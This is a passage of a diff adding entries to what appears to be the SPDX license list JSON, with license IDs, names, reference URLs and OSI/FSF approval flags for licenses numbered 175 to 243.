+ "seeAlso": [
+ "https://opensource.org/licenses/Frameworx-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
+ "referenceNumber": 175,
+ "name": "GNU Affero General Public License v3.0 only",
+ "licenseId": "AGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/DRL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
+ "referenceNumber": 176,
+ "name": "Detection Rule License 1.0",
+ "licenseId": "DRL-1.0",
+ "seeAlso": [
+ "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
+ "referenceNumber": 177,
+ "name": "Eiffel Forum License v2.0",
+ "licenseId": "EFL-2.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
+ "https://opensource.org/licenses/EFL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-99.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
+ "referenceNumber": 178,
+ "name": "Spencer License 99",
+ "licenseId": "Spencer-99",
+ "seeAlso": [
+ "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
+ "referenceNumber": 179,
+ "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
+ "licenseId": "CAL-1.0-Combined-Work-Exception",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
+ "referenceNumber": 180,
+ "name": "GNU Free Documentation License v1.1 only - invariants",
+ "licenseId": "GFDL-1.1-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TCL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TCL.json",
+ "referenceNumber": 181,
+ "name": "TCL/TK License",
+ "licenseId": "TCL",
+ "seeAlso": [
+ "http://www.tcl.tk/software/tcltk/license.html",
+ "https://fedoraproject.org/wiki/Licensing/TCL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SHL-0.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
+ "referenceNumber": 182,
+ "name": "Solderpad Hardware License v0.5",
+ "licenseId": "SHL-0.5",
+ "seeAlso": [
+ "https://solderpad.org/licenses/SHL-0.5/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
+ "referenceNumber": 183,
+ "name": "SIL Open Font License 1.0 with Reserved Font Name",
+ "licenseId": "OFL-1.0-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
+ "referenceNumber": 184,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
+ "referenceNumber": 185,
+ "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
+ "licenseId": "CERN-OHL-W-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Glide.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Glide.json",
+ "referenceNumber": 186,
+ "name": "3dfx Glide License",
+ "licenseId": "Glide",
+ "seeAlso": [
+ "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/mpich2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/mpich2.json",
+ "referenceNumber": 187,
+ "name": "mpich2 License",
+ "licenseId": "mpich2",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/psutils.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psutils.json",
+ "referenceNumber": 188,
+ "name": "psutils License",
+ "licenseId": "psutils",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psutils"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
+ "referenceNumber": 189,
+ "name": "Sun Public License v1.0",
+ "licenseId": "SPL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
+ "referenceNumber": 190,
+ "name": "Apache License 1.1",
+ "licenseId": "Apache-1.1",
+ "seeAlso": [
+ "http://apache.org/licenses/LICENSE-1.1",
+ "https://opensource.org/licenses/Apache-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
+ "referenceNumber": 191,
+ "name": "Creative Commons Attribution No Derivatives 4.0 International",
+ "licenseId": "CC-BY-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
+ "referenceNumber": 192,
+ "name": "FreeBSD Documentation License",
+ "licenseId": "FreeBSD-DOC",
+ "seeAlso": [
+ "https://www.freebsd.org/copyright/freebsd-doc-license/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SCEA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SCEA.json",
+ "referenceNumber": 193,
+ "name": "SCEA Shared Source License",
+ "licenseId": "SCEA",
+ "seeAlso": [
+ "http://research.scea.com/scea_shared_source_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Latex2e.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
+ "referenceNumber": 194,
+ "name": "Latex2e License",
+ "licenseId": "Latex2e",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Latex2e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
+ "referenceNumber": 195,
+ "name": "Artistic License 1.0 w/clause 8",
+ "licenseId": "Artistic-1.0-cl8",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
+ "referenceNumber": 196,
+ "name": "SGI Free Software License B v1.1",
+ "licenseId": "SGI-B-1.1",
+ "seeAlso": [
+ "http://oss.sgi.com/projects/FreeB/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NRL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NRL.json",
+ "referenceNumber": 197,
+ "name": "NRL License",
+ "licenseId": "NRL",
+ "seeAlso": [
+ "http://web.mit.edu/network/isakmp/nrllicense.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SWL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SWL.json",
+ "referenceNumber": 198,
+ "name": "Scheme Widget Library (SWL) Software License Agreement",
+ "licenseId": "SWL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/SWL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zed.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zed.json",
+ "referenceNumber": 199,
+ "name": "Zed License",
+ "licenseId": "Zed",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Zed"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
+ "referenceNumber": 200,
+ "name": "CERN Open Hardware Licence v1.1",
+ "licenseId": "CERN-OHL-1.1",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
+ "referenceNumber": 201,
+ "name": "Red Hat eCos Public License v1.1",
+ "licenseId": "RHeCos-1.1",
+ "seeAlso": [
+ "http://ecos.sourceware.org/old-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JasPer-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
+ "referenceNumber": 202,
+ "name": "JasPer License",
+ "licenseId": "JasPer-2.0",
+ "seeAlso": [
+ "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
+ "referenceNumber": 203,
+ "name": "Server Side Public License, v 1",
+ "licenseId": "SSPL-1.0",
+ "seeAlso": [
+ "https://www.mongodb.com/licensing/server-side-public-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
+ "referenceNumber": 204,
+ "name": "GNU General Public License v2.0 or later",
+ "licenseId": "GPL-2.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+ "https://opensource.org/licenses/GPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
+ "referenceNumber": 205,
+ "name": "Open LDAP Public License v1.4",
+ "licenseId": "OLDAP-1.4",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/libpng-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
+ "referenceNumber": 206,
+ "name": "PNG Reference Library version 2",
+ "licenseId": "libpng-2.0",
+ "seeAlso": [
+ "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
+ "referenceNumber": 207,
+ "name": "CNRI Python Open Source GPL Compatible License Agreement",
+ "licenseId": "CNRI-Python-GPL-Compatible",
+ "seeAlso": [
+ "http://www.python.org/download/releases/1.6.1/download_win/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Aladdin.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
+ "referenceNumber": 208,
+ "name": "Aladdin Free Public License",
+ "licenseId": "Aladdin",
+ "seeAlso": [
+ "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
+ "referenceNumber": 209,
+ "name": "CeCILL Free Software License Agreement v1.0",
+ "licenseId": "CECILL-1.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Ruby.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Ruby.json",
+ "referenceNumber": 210,
+ "name": "Ruby License",
+ "licenseId": "Ruby",
+ "seeAlso": [
+ "http://www.ruby-lang.org/en/LICENSE.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
+ "referenceNumber": 211,
+ "name": "Netscape Public License v1.1",
+ "licenseId": "NPL-1.1",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.1/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ImageMagick.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
+ "referenceNumber": 212,
+ "name": "ImageMagick License",
+ "licenseId": "ImageMagick",
+ "seeAlso": [
+ "http://www.imagemagick.org/script/license.php"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Cube.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Cube.json",
+ "referenceNumber": 213,
+ "name": "Cube License",
+ "licenseId": "Cube",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Cube"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
+ "referenceNumber": 214,
+ "name": "GNU Free Documentation License v1.1 only",
+ "licenseId": "GFDL-1.1-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
+ "referenceNumber": 215,
+ "name": "Creative Commons Attribution 2.0 Generic",
+ "licenseId": "CC-BY-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
+ "referenceNumber": 216,
+ "name": "Academic Free License v1.2",
+ "licenseId": "AFL-1.2",
+ "seeAlso": [
+ "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
+ "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
+ "referenceNumber": 217,
+ "name": "Creative Commons Attribution Share Alike 2.0 Generic",
+ "licenseId": "CC-BY-SA-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
+ "referenceNumber": 218,
+ "name": "CeCILL Free Software License Agreement v2.0",
+ "licenseId": "CECILL-2.0",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-advertising.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
+ "referenceNumber": 219,
+ "name": "Enlightenment License (e16)",
+ "licenseId": "MIT-advertising",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
+ "referenceNumber": 220,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
+ "licenseId": "CC-BY-NC-SA-2.5",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
+ "referenceNumber": 221,
+ "name": "Artistic License 1.0",
+ "licenseId": "Artistic-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Artistic-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
+ "referenceNumber": 222,
+ "name": "Open Software License 3.0",
+ "licenseId": "OSL-3.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
+ "https://opensource.org/licenses/OSL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/X11.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/X11.json",
+ "referenceNumber": 223,
+ "name": "X11 License",
+ "licenseId": "X11",
+ "seeAlso": [
+ "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Bahyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
+ "referenceNumber": 224,
+ "name": "Bahyph License",
+ "licenseId": "Bahyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Bahyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
+ "referenceNumber": 225,
+ "name": "Open LDAP Public License v2.0.1",
+ "licenseId": "OLDAP-2.0.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUDatagrid.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
+ "referenceNumber": 226,
+ "name": "EU DataGrid Software License",
+ "licenseId": "EUDatagrid",
+ "seeAlso": [
+ "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
+ "https://opensource.org/licenses/EUDatagrid"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MTLL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MTLL.json",
+ "referenceNumber": 227,
+ "name": "Matrix Template Library License",
+ "licenseId": "MTLL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-invariants-only.json",
+ "referenceNumber": 228,
+ "name": "GNU Free Documentation License v1.2 only - invariants",
+ "licenseId": "GFDL-1.2-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-or-later.json",
+ "referenceNumber": 229,
+ "name": "GNU Free Documentation License v1.3 or later - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/curl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/curl.json",
+ "referenceNumber": 230,
+ "name": "curl License",
+ "licenseId": "curl",
+ "seeAlso": [
+ "https://github.com/bagder/curl/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LAL-1.3.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LAL-1.3.json",
+ "referenceNumber": 231,
+ "name": "Licence Art Libre 1.3",
+ "licenseId": "LAL-1.3",
+ "seeAlso": [
+ "https://artlibre.org/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DSDP.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DSDP.json",
+ "referenceNumber": 232,
+ "name": "DSDP License",
+ "licenseId": "DSDP",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/DSDP"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.2.json",
+ "referenceNumber": 233,
+ "name": "CERN Open Hardware Licence v1.2",
+ "licenseId": "CERN-OHL-1.2",
+ "seeAlso": [
+ "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.2"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TOSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TOSL.json",
+ "referenceNumber": 234,
+ "name": "Trusster Open Source License",
+ "licenseId": "TOSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TOSL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-autoconf-exception.json",
+ "referenceNumber": 235,
+ "name": "GNU General Public License v3.0 w/Autoconf exception",
+ "licenseId": "GPL-3.0-with-autoconf-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/autoconf-exception-3.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-3.0.json",
+ "referenceNumber": 236,
+ "name": "Creative Commons Attribution 3.0 Unported",
+ "licenseId": "CC-BY-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Qhull.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Qhull.json",
+ "referenceNumber": 237,
+ "name": "Qhull License",
+ "licenseId": "Qhull",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Qhull"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-no-invariants-only.json",
+ "referenceNumber": 238,
+ "name": "GNU Free Documentation License v1.3 only - no invariants",
+ "licenseId": "GFDL-1.3-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TORQUE-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TORQUE-1.1.json",
+ "referenceNumber": 239,
+ "name": "TORQUE v2.5+ Software License v1.1",
+ "licenseId": "TORQUE-1.1",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/TORQUEv1.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MS-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MS-PL.json",
+ "referenceNumber": 240,
+ "name": "Microsoft Public License",
+ "licenseId": "MS-PL",
+ "seeAlso": [
+ "http://www.microsoft.com/opensource/licenses.mspx",
+ "https://opensource.org/licenses/MS-PL"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Apache-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Apache-1.0.json",
+ "referenceNumber": 241,
+ "name": "Apache License 1.0",
+ "licenseId": "Apache-1.0",
+ "seeAlso": [
+ "http://www.apache.org/licenses/LICENSE-1.0"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.1.json",
+ "referenceNumber": 242,
+ "name": "copyleft-next 0.3.1",
+ "licenseId": "copyleft-next-0.3.1",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.1"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-or-later.json",
+ "referenceNumber": 243,
+ "name": "GNU Free Documentation License v1.2 or later",
+ "licenseId": "GFDL-1.2-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
